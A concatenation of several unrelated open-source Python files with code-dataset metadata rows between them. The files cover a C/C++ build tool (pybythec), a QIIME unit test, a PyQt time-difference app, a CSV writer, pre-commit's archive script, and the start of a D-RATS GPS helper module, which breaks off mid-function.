| bsd-3-clause | -9,183,936,321,529,190,000 | 38.143564 | 108 | 0.621981 | false |
glowtree/pybythec | pybythec/__init__.py | 1 | 18150 | # -*- coding: utf-8 -*-
from pybythec import utils
from pybythec.utils import f
from pybythec.utils import PybythecError
from pybythec.BuildStatus import BuildStatus
from pybythec.BuildElements import BuildElements
import os
import sys
import time
from threading import Thread
log = utils.Logger('pybythec')
__author__ = 'glowtree'
__email__ = '[email protected]'
__version__ = '0.9.61'
def getBuildElements(osType = None,
compiler = None,
buildType = None,
binaryFormat = None,
projConfigPath = None,
globalConfigPath = None,
projConfig = None,
globalConfig = None,
currentBuild = None,
libDir = None):
'''
passthrough function that catches and reports exceptions
'''
try:
return BuildElements(
osType = osType,
compiler = compiler,
buildType = buildType,
binaryFormat = binaryFormat,
projConfig = projConfig,
projConfigPath = projConfigPath,
globalConfig = globalConfig,
globalConfigPath = globalConfigPath,
currentBuild = currentBuild,
libDir = libDir)
except PybythecError as e:
log.error(e)
return None
except Exception as e:
log.error('unknown exception: {0}', e)
return None
def build(be = None, builds = None):
'''
be: BuildElements object
builds: list of build overrides
'''
if not be:
be = getBuildElements()
if not be:
return
_runPreScript(be)
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
continue
except Exception as e:
log.error('unknown exception: {0}', e)
continue
_build(be)
def _build(be):
'''
does the dirty work of compiling and linking based on the state setup in the BuildElements object be
'''
threading = True # TODO: perhaps this could be an function argument
buildStatus = BuildStatus(be.targetFilename, be.buildPath)
# lock - early return
if be.locked and os.path.exists(be.targetInstallPath):
buildStatus.writeInfo('locked', '{0} is locked', be.targetName)
return True
startTime = time.time()
log.info('building ' + be.infoStr)
buildingLib = False
if be.libDir:
buildingLib = True
if not os.path.exists(be.installPath):
utils.createDirs(be.installPath)
if not os.path.exists(be.buildPath):
os.makedirs(be.buildPath)
incPathList = []
for incPath in be.incPaths:
if os.path.exists(incPath):
incPathList += ['-I', incPath]
else:
log.warning('incPath {0} doesn\'t exist', incPath)
for extIncPath in be.extIncPaths: # external include libs (for cases where 3rd party header includes are using "" instead of <> ie Unreal)
if os.path.exists(incPath):
incPathList += ['-I', extIncPath]
else:
log.warning('extIncPath {0} doesn\'t exist', extIncPath)
definesList = []
for define in be.defines:
definesList += ['-D', define]
#
# qt moc file compilation, TODO: make this another compiler option, along with asm
#
mocPaths = []
for qtClass in be.qtClasses:
found = False
mocPath = f('{0}/moc_{1}.cpp', be.buildPath, qtClass)
qtClassHeader = qtClass + '.h'
for incPath in be.incPaths: # find the header file, # TODO: should there be a separate list of headers ie be.mocIncPaths?
includePath = incPath + '/' + qtClassHeader
if not os.path.exists(includePath):
continue
if os.path.exists(mocPath) and float(os.stat(mocPath).st_mtime) < float(os.stat(includePath).st_mtime) or not os.path.exists(mocPath):
buildStatus.description = 'qt moc: ' + utils.runCmd(['moc'] + definesList + [includePath, '-o', mocPath])
if not os.path.exists(mocPath):
buildStatus.writeError(buildStatus.description)
return False
mocPaths.append(mocPath)
found = True
if not found:
buildStatus.writeError('can\'t find {0} for qt moc compilation', qtClassHeader)
return False
for mocPath in mocPaths:
be.sources.append(mocPath)
buildStatusDeps = [] # the build status for each dependency: objs and libs
threads = []
i = 0
#
# compile
#
objPaths = []
cmd = [be.compilerCmd, be.objFlag] + incPathList + definesList + be.flags
if threading:
for source in be.sources:
buildStatusDep = BuildStatus(source)
buildStatusDeps.append(buildStatusDep)
thread = Thread(None, target = _compileSrc, args = (be, cmd, source, objPaths, buildStatusDep))
thread.start()
threads.append(thread)
i += 1
else:
for source in be.sources:
buildStatusDep = BuildStatus(source)
buildStatusDeps.append(buildStatusDep)
_compileSrc(be, cmd, source, objPaths, buildStatusDep)
i += 1
#
# build library dependencies
#
libCmds = []
libsBuilding = []
if be.binaryType == 'exe' or be.binaryType == 'plugin':
for lib in be.libs:
libName = lib
if be.compiler.startswith('msvc'):
libCmds += [libName + be.staticExt] # you need to link against the .lib stub file even if it's ultimately a .dll that gets linked
else:
libCmds += [be.libFlag, libName]
# check if the lib has a directory for building
if threading:
for libSrcDir in be.libSrcPaths:
libSrcDir = os.path.join(libSrcDir, lib)
if os.path.exists(libSrcDir):
libsBuilding.append(lib)
buildStatusDep = BuildStatus(lib)
buildStatusDeps.append(buildStatusDep)
thread = Thread(None, target = _buildLib, args = (be, libSrcDir, buildStatusDep))
thread.start()
threads.append(thread)
i += 1
break
else:
for libSrcPath in be.libSrcPaths:
if not os.path.exists('libSrcPath'):
log.warning('libSrcPath {0} doesn\'t exist', libSrcPath)
continue
libSrcPath = os.path.join(libSrcPath, lib)
if os.path.exists(libSrcPath):
libsBuilding.append(lib)
buildStatusDep = BuildStatus(lib)
buildStatusDeps.append(buildStatusDep)
_buildLib(be, libSrcDir, buildStatusDep)
i += 1
break
# wait for all the threads before checking the results
for thread in threads:
thread.join()
allUpToDate = True
for buildStatusDep in buildStatusDeps:
if buildStatusDep.status == 'failed':
# NOTE: changed from buildStatusDep.description.encode('ascii', 'ignore') which fixed issue on macOs
buildStatus.writeError('{0} failed because {1} failed because...\n\n{2}\n...determined in seconds\n\n', be.infoStr, buildStatusDep.name,
buildStatusDep.description, str(int(time.time() - startTime)))
return False
elif buildStatusDep.status == 'built':
allUpToDate = False
# revise the library paths
for i in range(len(be.libPaths)):
revisedLibPath = be.libPaths[i] + be.binaryRelPath
if os.path.exists(revisedLibPath):
be.libPaths[i] = revisedLibPath
else: # try without the currentBuild leaf dir, ie 3rd party libs likely won't have them
revisedLibPath = f('{0}/{1}/{2}/{3}/{4}', be.libPaths[i], be.osType, be.buildType, be.compilerVersion, be.binaryFormat)
if os.path.exists(revisedLibPath):
be.libPaths[i] = revisedLibPath
# check for multiple instances of a lib: link erros due to linking to the wrong version of a lib can be a nightmare to debug
# if you don't suspect it's the wrong version
libsFound = {} # lib name, array of paths where it was found
for p in be.libPaths:
for lib in be.libs:
if be.compiler.startswith('msvc'):
staticPath = f('{0}/{1}{2}', p, lib, be.staticExt)
dynamicPath = f('{0}/{1}{2}', p, lib, be.dynamicExt)
else:
staticPath = f('{0}/lib{1}{2}', p, lib, be.staticExt)
dynamicPath = f('{0}/lib{1}{2}', p, lib, be.dynamicExt)
if os.path.exists(staticPath) or os.path.exists(dynamicPath):
if lib in libsFound:
libsFound[lib].append(p)
else:
libsFound[lib] = [p]
for l in libsFound:
libPaths = libsFound[l]
if len(libPaths) > 1:
log.w('lib {0} found in more than one place: {1}\n', l, libPaths)
#
# linking
#
linkCmd = []
if allUpToDate and os.path.exists(be.targetInstallPath):
buildStatus.writeInfo('up to date', '{0} is up to date, determined in {1} seconds\n', be.infoStr, str(int(time.time() - startTime)))
if not buildingLib:
_runPostScript(be)
return True
# microsoft's compiler / linker can only handle so many characters on the command line
msvcLinkCmdFilePath = be.buildPath + '/linkCmd'
if be.compiler.startswith('msvc'):
msvcLinkCmd = f('{0}"{1}" "{2}" {3}', be.targetFlag, be.targetInstallPath, '" "'.join(objPaths), ' '.join(libCmds))
msvcLinkCmdFp = open(msvcLinkCmdFilePath, 'w')
msvcLinkCmdFp.write(msvcLinkCmd)
msvcLinkCmdFp.close()
linkCmd += [be.linker, '@' + msvcLinkCmdFilePath]
if be.showLinkerCmds:
log.info('\nmsvcLinkCmd: {0}\n', msvcLinkCmd)
else:
linkCmd += [be.linker, be.targetFlag, be.targetInstallPath] + objPaths + libCmds
if be.binaryType != 'static': # TODO: is this the case for msvc?
linkCmd += be.linkFlags
if be.binaryType == 'exe' or be.binaryType == 'plugin' or (be.compilerRoot == 'msvc' and be.binaryType == 'dynamic'):
for libPath in be.libPaths:
if not os.path.exists(libPath):
log.warning('libPath {0} doesn\'t exist', libPath)
continue
if be.compiler.startswith('msvc'):
linkCmd += [be.libPathFlag + os.path.normpath(libPath)]
else:
linkCmd += [be.libPathFlag, os.path.normpath(libPath)]
# get the timestamp of the existing target if it exists
linked = False
targetExisted = False
oldTargetTimeStamp = None
if os.path.exists(be.targetInstallPath):
oldTargetTimeStamp = float(os.stat(be.targetInstallPath).st_mtime)
targetExisted = True
if be.showLinkerCmds:
log.info('\n{0}\n', ' '.join(linkCmd))
buildStatus.description = utils.runCmd(linkCmd)
if os.path.exists(be.targetInstallPath):
if targetExisted:
if float(os.stat(be.targetInstallPath).st_mtime) > oldTargetTimeStamp:
linked = True
else:
linked = True
if linked:
log.info('linked ' + be.infoStr)
else:
buildStatus.writeError('linking failed because {0}', buildStatus.description)
return False
# copy dynamic library dependencies to the install path
if be.copyDynamicLibs:
if be.binaryType == 'exe' or be.binaryType == 'plugin':
for lib in be.libs:
for libPath in be.libPaths:
dynamicPath = libPath + '/'
if be.compilerRoot == 'gcc' or be.compilerRoot == 'clang':
dynamicPath += 'lib'
dynamicPath += lib + be.dynamicExt
if os.path.exists(dynamicPath):
utils.copyfile(dynamicPath, be.installPath)
buildStatus.writeInfo('built', '{0} built {1}\ncompleted in {2} seconds\n', be.infoStr, be.targetInstallPath, str(int(time.time() - startTime)))
sys.stdout.flush()
# run a post-build script if it exists
if not buildingLib:
_runPostScript(be)
return True
#
# private functions
#
def _compileSrc(be, compileCmd, source, objPaths, buildStatus):
'''
be (in): BuildElements object
compileCmd (in): the compile command so far
source (in): the c or cpp source file to compile (every source file gets it's own object file)
objPaths (out): list of all object paths that will be passed to the linker
buildStatus (out): build status for this particular compile, defaults to failed
'''
if not os.path.exists(source):
buildStatus.writeError('{0} is missing, exiting build', source)
return
objFile = os.path.basename(source)
objFile = objFile.replace(os.path.splitext(source)[1], be.objExt)
objPath = os.path.join(be.buildPath, objFile)
objPaths.append(objPath)
# check if it's up to date
objExisted = os.path.exists(objPath)
if objExisted:
objTimestamp = float(os.stat(objPath).st_mtime)
if objTimestamp > be.latestConfigTimestamp and not utils.sourceNeedsBuilding(be.incPaths, source, objTimestamp):
buildStatus.status = 'up to date'
return
# if not utils.sourceNeedsBuilding(be.incPaths, source, objTimestamp):
# buildStatus.status = 'up to date'
# return
# Microsoft Visual C has to have the objPathFlag cuddled up directly next to the objPath - no space in between them (grrr)
if be.compiler.startswith('msvc'):
cmd = compileCmd + [source, be.objPathFlag + objPath]
else:
cmd = compileCmd + [source, be.objPathFlag, objPath]
if be.showCompilerCmds:
log.info('\n' + ' '.join(cmd) + '\n')
buildStatus.description = utils.runCmd(cmd)
if os.path.exists(objPath):
if objExisted:
if float(os.stat(objPath).st_mtime) > objTimestamp:
buildStatus.status = 'built'
else:
buildStatus.status = 'built'
if buildStatus.status == 'built':
buildStatus.description = 'compiled ' + os.path.basename(source)
else:
log.error('{0} failed to build', objPath)
def _buildLib(be, libSrcDir, buildStatus):
'''
'''
libBe = getBuildElements(
osType = be.osType,
compiler = be.compiler,
buildType = be.buildType,
binaryFormat = be.binaryFormat,
projConfig = be.projConfig,
globalConfig = be.globalConfig,
currentBuild = be.currentBuild,
libDir = libSrcDir)
if not libBe:
return
build(libBe)
# read the build status
buildStatus.readFromFile(libSrcDir, be.buildDir, be.binaryRelPath)
def clean(be = None, builds = None):
'''
'''
if not be:
be = getBuildElements()
if not be:
return
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
return
except Exception as e:
log.error('unknown exception: {0}', e)
return
_clean(be)
def _clean(be = None):
'''
cleans the current project
be (in): BuildElements object
'''
# remove any dynamic libs that are sitting next to the exe
if os.path.exists(be.installPath) and (be.binaryType == 'exe' or be.binaryType == 'plugin'):
for fl in os.listdir(be.installPath):
libName, ext = os.path.splitext(fl)
if ext == be.dynamicExt:
if be.compilerRoot == 'gcc' or be.compilerRoot == 'clang':
libName = libName.lstrip('lib')
for lib in be.libs:
if lib == libName:
p = be.installPath + '/' + fl
try:
os.remove(p)
except Exception:
log.warning('failed to remove {0}', p)
elif ext == '.exp' or ext == '.ilk' or ext == '.lib' or ext == '.pdb': # msvc files
p = be.installPath + '/' + fl
try:
os.remove(p)
except Exception:
log.warning('failed to remove {0}', p)
if not os.path.exists(be.buildPath): # canary in the coal mine
log.info(be.infoStr + ' already clean')
return True
dirCleared = True
for fl in os.listdir(be.buildPath):
p = be.buildPath + '/' + fl
try:
os.remove(p)
except Exception:
dirCleared = False
log.warning('failed to remove {0}', p)
if dirCleared:
os.removedirs(be.buildPath)
if os.path.exists(be.targetInstallPath):
os.remove(be.targetInstallPath)
target, ext = os.path.splitext(be.targetInstallPath)
if ext == '.dll':
try:
os.remove(target + '.exp')
os.remove(target + '.lib')
except Exception:
pass
try:
os.removedirs(be.installPath)
except Exception:
pass
log.info(be.infoStr + ' all clean')
return True
def cleanAll(be = None, builds = None):
'''
cleans both the current project and also the dependencies
'''
if not be:
be = getBuildElements()
if not be:
return
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
continue
except Exception as e:
log.error('unknown exception: {0}', e)
continue
_clean(be)
# clean library dependencies
for lib in be.libs:
for libSrcPath in be.libSrcPaths:
libPath = os.path.join(libSrcPath, lib)
if os.path.exists(libPath):
libBe = getBuildElements(
osType = be.osType,
compiler = be.compiler,
buildType = be.buildType,
binaryFormat = be.binaryFormat,
projConfig = be.projConfig,
globalConfig = be.globalConfig,
currentBuild = be.currentBuild,
libDir = libPath)
if not libBe:
return
clean(libBe) # builds = build)
def _runPreScript(be):
'''
looks for a pre-build script and loads it as a module
'''
pathRoot = '.'
if be.libDir:
pathRoot = be.libDir
preScriptPath = pathRoot + '/pybythecPre.py'
if not os.path.exists(preScriptPath):
preScriptPath = pathRoot + '/.pybythecPre.py'
if os.path.exists(preScriptPath):
import imp
m = imp.load_source('', preScriptPath)
m.run(be)
def _runPostScript(be):
'''
looks for a post-build script and loads it as a module
'''
pathRoot = '.'
if be.libDir:
pathRoot = be.libDir
postScriptPath = pathRoot + '/pybythecPost.py'
if not os.path.exists(postScriptPath):
postScriptPath = pathRoot + '/.pybythecPost.py'
if os.path.exists(postScriptPath):
import imp
m = imp.load_source('', postScriptPath)
m.run(be)
| isc | 2,476,342,218,496,277,000 | 29.658784 | 146 | 0.638182 | false |
wasade/qiime | tests/test_core_microbiome.py | 1 | 4217 | #!/usr/bin/env python
# File created on 08 Jun 2012
from __future__ import division
__author__ = "Greg Caporaso"
__copyright__ = "Copyright 2011, The QIIME project"
__credits__ = ["Greg Caporaso"]
__license__ = "GPL"
__version__ = "1.8.0-dev"
__maintainer__ = "Greg Caporaso"
__email__ = "[email protected]"
from unittest import TestCase, main
from biom.parse import parse_biom_table
from qiime.core_microbiome import (core_observations_across_sample_ids)
class ComputeCoreMicrobiomeTests(TestCase):
""" """
def setUp(self):
""" """
self.otu_table_data1 = parse_biom_table(otu_table1)
self.otu_table_data2 = parse_biom_table(otu_table2)
def test_core_observations_across_sample_ids(self):
""" core_observations_across_sample_ids functions as expected
"""
actual = core_observations_across_sample_ids(self.otu_table_data1,
["S1", "s2"],
fraction_for_core=1.)
expected = ['o1', 'o5']
self.assertEqual(actual, expected)
# fraction_for_core = 0.5
actual = core_observations_across_sample_ids(self.otu_table_data1,
["S1", "s2"],
fraction_for_core=0.5)
expected = ['o1', 'o3', 'o5']
self.assertEqual(actual, expected)
def test_core_observations_across_sample_ids_invalid(self):
""" core_observations_across_sample_ids handles invalid input as expected
"""
self.assertRaises(ValueError,
core_observations_across_sample_ids,
self.otu_table_data1,
["S1", "s2"],
fraction_for_core=1.001)
self.assertRaises(ValueError,
core_observations_across_sample_ids,
self.otu_table_data1,
["S1", "s2"],
fraction_for_core=-0.001)
def test_core_observations_across_sample_ids_no_core(self):
"""core_observations_across_sample_ids handles filtering all obs
"""
actual = core_observations_across_sample_ids(self.otu_table_data2,
["S1", "s2", "s3", "s4"],
fraction_for_core=1.)
expected = []
self.assertEqual(actual, expected)
otu_table1 = """{"rows": [{"id": "o1", "metadata": {"OTUMetaData": "Eukarya;Human"}}, {"id": "o2", "metadata": {"OTUMetaData": "Eukarya;Moose"}}, {"id": "o3", "metadata": {"OTUMetaData": "Eukarya;Galapagos Tortoise"}}, {"id": "o4", "metadata": {"OTUMetaData": "Eukarya;Bigfoot"}}, {"id": "o5", "metadata": {"OTUMetaData": "Eukarya;Chicken"}}], "format": "Biological Observation Matrix 0.9.3", "data": [[0, 0, 105.0], [0, 1, 42.0], [0, 2, 99.0], [0, 3, 60000.0], [1, 2, 9.0], [1, 3, 99.0], [2, 0, 45.0], [4, 0, 1.0], [4, 1, 2.0], [4, 3, 3.0]], "columns": [{"id": "S1", "metadata": null}, {"id": "s2", "metadata": null}, {"id": "s3", "metadata": null}, {"id": "s4", "metadata": null}], "generated_by": "BIOM-Format 0.9.3", "matrix_type": "sparse", "shape": [5, 4], "format_url": "http://biom-format.org", "date": "2012-06-08T14:42:46.058411", "type": "OTU table", "id": null, "matrix_element_type": "float"}"""
otu_table2 = """{"rows": [{"id": "o1", "metadata": null}, {"id": "o2", "metadata": null}, {"id": "o3", "metadata": null}, {"id": "o4", "metadata": null}, {"id": "o5", "metadata": null}], "format": "Biological Observation Matrix 0.9.3", "data": [[0, 0, 105.0], [0, 1, 42.0], [0, 2, 99.0], [1, 2, 9.0], [1, 3, 99.0], [2, 0, 45.0], [4, 0, 1.0], [4, 1, 2.0], [4, 3, 3.0]], "columns": [{"id": "S1", "metadata": null}, {"id": "s2", "metadata": null}, {"id": "s3", "metadata": null}, {"id": "s4", "metadata": null}], "generated_by": "BIOM-Format 0.9.3", "matrix_type": "sparse", "shape": [5, 4], "format_url": "http://biom-format.org", "date": "2012-06-08T14:43:27.964500", "type": "OTU table", "id": null, "matrix_element_type": "float"}"""
if __name__ == "__main__":
main()
| gpl-2.0 | 8,308,714,476,410,311,000 | 55.986486 | 908 | 0.526678 | false |
git-commit/TardisDiff | TardisDiff.py | 1 | 4981 | import sys
import os
import inspect
from PyQt5 import QtWidgets, QtCore, QtGui
import plugnplay
from uptime import boottime
from TardisUtil import TardisOptions, TimeSubmitter
class TardisDiff(QtWidgets.QMainWindow):
def __init__(self):
super(TardisDiff, self).__init__()
self.difference = 0
self.clipboard = QtWidgets.QApplication.clipboard()
# Set hot keys
QtWidgets.QShortcut(QtGui.QKeySequence("Ctrl+Shift+C"), self,
self.setClipboard)
QtWidgets.QShortcut(QtGui.QKeySequence("Ctrl+Shift+T"), self,
self.notify_time_submitters)
self.options = TardisOptions()
# Get plugins
plugnplay.plugin_dirs = ['./plugins', ]
plugnplay.load_plugins()
# Get directory path
# From: http://stackoverflow.com/a/22881871/1963958
if getattr(sys, 'frozen', False): # py2exe, PyInstaller, cx_Freeze
script_path = os.path.abspath(sys.executable)
else:
script_path = inspect.getabsfile(TardisDiff)
script_path = os.path.realpath(script_path)
script_path = os.path.dirname(script_path)
# Google for a fancy tardis icon until I've made one
self.setWindowIcon(QtGui.QIcon(
os.path.join(script_path, 'icon', 'tardis-by-camilla-isabell-kasbo.ico')))
self.initUI()
def initUI(self):
# Create and initialize UI elements
self.contentWidget = QtWidgets.QWidget()
self.gridLayout = QtWidgets.QGridLayout(self.contentWidget)
self.formLayout = QtWidgets.QFormLayout()
self.timeEdit1 = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEdit2 = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEditBreakTime = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEditBreakTime.setDisplayFormat("h:mm")
self.timeEditBreakTime.setCurrentSection(
QtWidgets.QDateTimeEdit.MinuteSection)
self.timeEditBreakTime.setTime(QtCore.QTime(0, 30))
self.label_timeDiffOut = QtWidgets.QLabel(self.contentWidget)
self.button_time1_now = QtWidgets.QPushButton(
"Now", self.contentWidget)
self.button_time2_now = QtWidgets.QPushButton(
"Now", self.contentWidget)
self.label_timeDiffOut.setText("")
self.timeEdit1.setTime(self.getStartTime())
self.timeEdit2.setTime(QtCore.QTime.currentTime())
# Add UI elements
row1 = QtWidgets.QHBoxLayout()
row1.addWidget(self.timeEdit1)
row1.addWidget(self.button_time1_now)
row2 = QtWidgets.QHBoxLayout()
row2.addWidget(self.timeEdit2)
row2.addWidget(self.button_time2_now)
self.formLayout.addRow("Time 1:", row1)
self.formLayout.addRow("Time 2:", row2)
self.formLayout.addRow("Break Time:", self.timeEditBreakTime)
self.formLayout.addRow("Difference:", self.label_timeDiffOut)
self.gridLayout.addLayout(self.formLayout, 0, 0, 1, 1)
self.setCentralWidget(self.contentWidget)
self.statusBar()
# connect slots
self.timeEdit1.timeChanged.connect(self.inputChanged)
self.timeEdit2.timeChanged.connect(self.inputChanged)
self.timeEditBreakTime.timeChanged.connect(self.inputChanged)
self.button_time1_now.pressed.connect(self.reset_time1)
self.button_time2_now.pressed.connect(self.reset_time2)
self.setWindowTitle('TardisDiff')
self.inputChanged()
self.show()
def inputChanged(self):
"""
Checks both time inputs and the break time
input to determine the difference.
Then calls the method to update the ui.
"""
time1 = self.timeEdit1.time()
time2 = self.timeEdit2.time()
breakTime = self.timeEditBreakTime.time().secsTo(QtCore.QTime(0, 0))
self.difference = (time1.secsTo(time2) + breakTime) / 3600
self.difference = round(self.difference, 2)
self.label_timeDiffOut.setText(str(self.difference))
def reset_time1(self):
self.timeEdit1.setTime(QtCore.QTime.currentTime())
def reset_time2(self):
self.timeEdit2.setTime(QtCore.QTime.currentTime())
def setClipboard(self):
"""Sets the current diff text to clipboard"""
self.clipboard.setText(str(self.difference))
self.statusBar().showMessage("Copied to clipboard.")
def getStartTime(self):
return TardisDiff.getBootTimeAsQTime()\
if self.options.isStartTimeAuto()\
else QtCore.QTime.fromString(self.options.getStartTime())
def notify_time_submitters(self):
TimeSubmitter.submit_time(self.difference)
@staticmethod
def getBootTimeAsQTime():
return QtCore.QDateTime(boottime()).time()
def main():
app = QtWidgets.QApplication(sys.argv)
ed = TardisDiff()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| isc | 2,382,846,917,862,565,000 | 35.094203 | 86 | 0.656495 | false |
PPKE-Bioinf/consensx.itk.ppke.hu | consensx/storage/csv.py | 1 | 1205 | class CSVBuffer(object):
"""Class which stores data for values.CSV"""
def __init__(self, my_path):
self.working_dir = my_path
self.max_resnum = -1
self.min_resnum = 100000
self.csv_data = []
def add_data(self, data):
self.csv_data.append(data)
def write_csv(self):
filename = self.working_dir + "values.csv"
output_csv = open(filename, 'w')
output_csv.write(',')
for data in self.csv_data:
output_csv.write(data["name"] + " EXP, " + data["name"] + " CALC,")
output_csv.write("\n")
for resnum in range(self.min_resnum, self.max_resnum + 1):
output_csv.write(str(resnum) + ',')
for data in self.csv_data:
exp = {}
for i in data["experimental"]:
exp[i.resnum] = i.value
try:
output_csv.write(
"{0:.2f}".format(exp[resnum]) + ',' +
"{0:.2f}".format(data["calced"][resnum]) + ','
)
except (IndexError, KeyError):
output_csv.write(',,')
output_csv.write("\n")
| mit | 8,709,585,037,877,639,000 | 31.567568 | 79 | 0.46971 | false |
philipgian/pre-commit | pre_commit/make_archives.py | 1 | 2079 | from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import os.path
import tarfile
from pre_commit import five
from pre_commit import output
from pre_commit.util import cmd_output
from pre_commit.util import cwd
from pre_commit.util import rmtree
from pre_commit.util import tmpdir
# This is a script for generating the tarred resources for git repo
# dependencies. Currently it's just for "vendoring" ruby support packages.
REPOS = (
('rbenv', 'git://github.com/rbenv/rbenv', 'e60ad4a'),
('ruby-build', 'git://github.com/rbenv/ruby-build', '9bc9971'),
(
'ruby-download',
'git://github.com/garnieretienne/rvm-download',
'09bd7c6',
),
)
RESOURCES_DIR = os.path.abspath(
os.path.join(os.path.dirname(__file__), 'resources')
)
def make_archive(name, repo, ref, destdir):
"""Makes an archive of a repository in the given destdir.
:param text name: Name to give the archive. For instance foo. The file
that is created will be called foo.tar.gz.
:param text repo: Repository to clone.
:param text ref: Tag/SHA/branch to check out.
:param text destdir: Directory to place archives in.
"""
output_path = os.path.join(destdir, name + '.tar.gz')
with tmpdir() as tempdir:
# Clone the repository to the temporary directory
cmd_output('git', 'clone', repo, tempdir)
with cwd(tempdir):
cmd_output('git', 'checkout', ref)
# We don't want the '.git' directory
# It adds a bunch of size to the archive and we don't use it at
# runtime
rmtree(os.path.join(tempdir, '.git'))
with tarfile.open(five.n(output_path), 'w|gz') as tf:
tf.add(tempdir, name)
return output_path
def main():
for archive_name, repo, ref in REPOS:
output.write_line('Making {}.tar.gz for {}@{}'.format(
archive_name, repo, ref,
))
make_archive(archive_name, repo, ref, RESOURCES_DIR)
if __name__ == '__main__':
exit(main())
| mit | -5,814,434,410,959,443,000 | 27.875 | 76 | 0.644541 | false |
coddingtonbear/d-rats | d_rats/gps.py | 1 | 33132 | import re
import time
import tempfile
import platform
import datetime
import subst
import threading
import serial
import socket
from math import pi,cos,acos,sin,atan2
import utils
if __name__ == "__main__":
import gettext
gettext.install("D-RATS")
TEST = "$GPGGA,180718.02,4531.3740,N,12255.4599,W,1,07,1.4,50.6,M,-21.4,M,,*63 KE7JSS ,440.350+ PL127.3"
EARTH_RADIUS = 3963.1
EARTH_UNITS = "mi"
DEGREE = u"\u00b0"
DPRS_TO_APRS = {}
# The DPRS to APRS mapping is pretty horrific, but the following
# attempts to create a mapping based on looking at the javascript
# for DPRSCalc and a list of regular APRS symbols
#
# http://ham-shack.com/aprs_pri_symbols.html
# http://www.aprs-is.net/DPRSCalc.aspx
for i in range(0, 26):
asciival = ord("A") + i
char = chr(asciival)
pri = "/"
sec = "\\"
DPRS_TO_APRS["P%s" % char] = pri + char
DPRS_TO_APRS["L%s" % char] = pri + char.lower()
DPRS_TO_APRS["A%s" % char] = sec + char
DPRS_TO_APRS["S%s" % char] = sec + char.lower()
if i <= 15:
pchar = chr(ord(" ") + i)
DPRS_TO_APRS["B%s" % char] = pri + pchar
DPRS_TO_APRS["O%s" % char] = sec + pchar
elif i >= 17:
pchar = chr(ord(" ") + i + 9)
DPRS_TO_APRS["M%s" % char] = pri + pchar
DPRS_TO_APRS["N%s" % char] = sec + pchar
if i <= 5:
char = chr(ord("S") + i)
pchar = chr(ord("[") + i)
DPRS_TO_APRS["H%s" % char] = pri + pchar
DPRS_TO_APRS["D%s" % char] = sec + pchar
#for k in sorted(DPRS_TO_APRS.keys()):
# print "%s => %s" % (k, DPRS_TO_APRS[k])
APRS_TO_DPRS = {}
for k,v in DPRS_TO_APRS.items():
APRS_TO_DPRS[v] = k
def dprs_to_aprs(symbol):
if len(symbol) < 2:
print "Invalid DPRS symbol: `%s'" % symbol
return None
else:
return DPRS_TO_APRS.get(symbol[0:2], None)
def parse_dms(string):
string = string.replace(u"\u00b0", " ")
string = string.replace('"', ' ')
string = string.replace("'", ' ')
string = string.replace(' ', ' ')
string = string.strip()
try:
(d, m, s) = string.split(' ', 3)
deg = int(d)
min = int(m)
sec = float(s)
except Exception, e:
deg = min = sec = 0
if deg < 0:
mul = -1
else:
mul = 1
deg = abs(deg)
return (deg + (min / 60.0) + (sec / 3600.0)) * mul
def set_units(units):
global EARTH_RADIUS
global EARTH_UNITS
if units == _("Imperial"):
EARTH_RADIUS = 3963.1
EARTH_UNITS = "mi"
elif units == _("Metric"):
EARTH_RADIUS = 6380.0
EARTH_UNITS = "km"
print "Set GPS units to %s" % units
def value_with_units(value):
if value < 0.5:
if EARTH_UNITS == "km":
scale = 1000
units = "m"
elif EARTH_UNITS == "mi":
scale = 5280
units = "ft"
else:
scale = 1
units = EARTH_UNITS
else:
scale = 1
units = EARTH_UNITS
return "%.2f %s" % (value * scale, units)
def NMEA_checksum(string):
checksum = 0
for i in string:
checksum ^= ord(i)
return "*%02x" % checksum
def GPSA_checksum(string):
def calc(buf):
icomcrc = 0xffff
for _char in buf:
char = ord(_char)
for i in range(0, 8):
xorflag = (((icomcrc ^ char) & 0x01) == 0x01)
icomcrc = (icomcrc >> 1) & 0x7fff
if xorflag:
icomcrc ^= 0x8408
char = (char >> 1) & 0x7f
return (~icomcrc) & 0xffff
return calc(string)
def DPRS_checksum(callsign, msg):
csum = 0
string = "%-8s,%s" % (callsign, msg)
for i in string:
csum ^= ord(i)
return "*%02X" % csum
def deg2rad(deg):
return deg * (pi / 180)
def rad2deg(rad):
return rad / (pi / 180)
def dm2deg(deg, min):
return deg + (min / 60.0)
def deg2dm(decdeg):
deg = int(decdeg)
min = (decdeg - deg) * 60.0
return deg, min
def nmea2deg(nmea, dir="N"):
deg = int(nmea) / 100
try:
min = nmea % (deg * 100)
except ZeroDivisionError, e:
min = int(nmea)
if dir == "S" or dir == "W":
m = -1
else:
m = 1
return dm2deg(deg, min) * m
def deg2nmea(deg):
deg, min = deg2dm(deg)
return (deg * 100) + min
def meters2feet(meters):
return meters * 3.2808399
def feet2meters(feet):
return feet * 0.3048
def distance(lat_a, lon_a, lat_b, lon_b):
lat_a = deg2rad(lat_a)
lon_a = deg2rad(lon_a)
lat_b = deg2rad(lat_b)
lon_b = deg2rad(lon_b)
earth_radius = EARTH_RADIUS
#print "cos(La)=%f cos(la)=%f" % (cos(lat_a), cos(lon_a))
#print "cos(Lb)=%f cos(lb)=%f" % (cos(lat_b), cos(lon_b))
#print "sin(la)=%f" % sin(lon_a)
#print "sin(lb)=%f" % sin(lon_b)
#print "sin(La)=%f sin(Lb)=%f" % (sin(lat_a), sin(lat_b))
#print "cos(lat_a) * cos(lon_a) * cos(lat_b) * cos(lon_b) = %f" % (\
# cos(lat_a) * cos(lon_a) * cos(lat_b) * cos(lon_b))
